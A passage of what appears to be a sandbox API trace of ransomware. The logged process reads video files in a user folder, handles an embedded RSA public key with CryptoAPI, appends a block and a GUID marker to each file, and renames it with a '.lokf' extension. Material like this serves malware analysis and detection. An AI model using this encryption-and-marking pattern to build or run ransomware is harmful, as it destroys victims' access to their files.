[0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ba8 [0060.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85bf0 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85bc0 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85bc0 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85bc0 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0060.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85bf0 | out: hHeap=0x660000) returned 1 [0060.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.142] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x89f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.142] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.142] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.142] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.142] CloseHandle (hObject=0x5cc) returned 1 [0060.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0060.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0060.143] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\3SncxiCXlF02Ky2.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\3sncxicxlf02ky2.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\3SncxiCXlF02Ky2.swf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\3sncxicxlf02ky2.swf.lokf")) returned 1 [0060.145] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefa39060, ftCreationTime.dwHighDateTime=0x1d4c634, ftLastAccessTime.dwLowDateTime=0x830d9de0, ftLastAccessTime.dwHighDateTime=0x1d4c87a, ftLastWriteTime.dwLowDateTime=0x830d9de0, ftLastWriteTime.dwHighDateTime=0x1d4c87a, nFileSizeHigh=0x0, nFileSizeLow=0x8a02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5OM_K.avi", cAlternateFileName="")) returned 1 [0060.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0060.145] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\5OM_K.avi") returned=".avi" [0060.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\5OM_K.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\5om_k.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.145] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=35330) returned 1 [0060.145] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.147] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x89dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.147] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.148] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x8a02, lpOverlapped=0x0) returned 1 [0060.148] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.148] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.148] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.148] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0060.149] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.149] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.149] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.149] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.149] GetLastError () returned 0x0 [0060.149] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.149] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0060.149] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.149] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.149] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.149] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.150] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.150] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.150] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8a02, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.150] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.150] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.150] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.150] CloseHandle (hObject=0x5cc) returned 1 [0060.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a90 [0060.151] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0060.151] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\5OM_K.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\5om_k.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\5OM_K.avi.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\5om_k.avi.lokf")) returned 1 [0060.152] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe10f690, ftCreationTime.dwHighDateTime=0x1d4c690, ftLastAccessTime.dwLowDateTime=0xaf3ca600, ftLastAccessTime.dwHighDateTime=0x1d4d332, ftLastWriteTime.dwLowDateTime=0xaf3ca600, ftLastWriteTime.dwHighDateTime=0x1d4d332, nFileSizeHigh=0x0, nFileSizeLow=0xbfa4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Gn4 UcsB.flv", cAlternateFileName="GN4UCS~1.FLV")) returned 1 [0060.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0060.152] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\Gn4 UcsB.flv") returned=".flv" [0060.153] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\Gn4 UcsB.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\gn4 ucsb.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.153] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=49060) returned 1 [0060.153] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.155] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbf7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.155] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.156] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xbfa4, lpOverlapped=0x0) returned 1 [0060.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.156] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0060.157] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.157] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.157] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.157] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.157] GetLastError () returned 0x0 [0060.157] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.157] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0060.157] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.157] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.157] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.158] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.158] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.158] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbfa4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.158] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.158] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.158] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.158] CloseHandle (hObject=0x5cc) returned 1 [0060.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a90 [0060.159] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0060.159] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\Gn4 UcsB.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\gn4 ucsb.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\Gn4 UcsB.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\gn4 ucsb.flv.lokf")) returned 1 [0060.160] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f684a50, ftCreationTime.dwHighDateTime=0x1d4c54b, ftLastAccessTime.dwLowDateTime=0x37621020, ftLastAccessTime.dwHighDateTime=0x1d4c694, ftLastWriteTime.dwLowDateTime=0x37621020, ftLastWriteTime.dwHighDateTime=0x1d4c694, nFileSizeHigh=0x0, nFileSizeLow=0x1961, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H85jqiLOTT6NBZY.swf", cAlternateFileName="H85JQI~1.SWF")) returned 1 [0060.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.161] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0060.161] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\H85jqiLOTT6NBZY.swf") returned=".swf" [0060.161] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\H85jqiLOTT6NBZY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\h85jqilott6nbzy.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.161] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=6497) returned 1 [0060.161] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.163] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x193b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.163] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.164] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1961, lpOverlapped=0x0) returned 1 [0060.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.164] lstrlenA (lpString="-----BEGIN PUBLIC 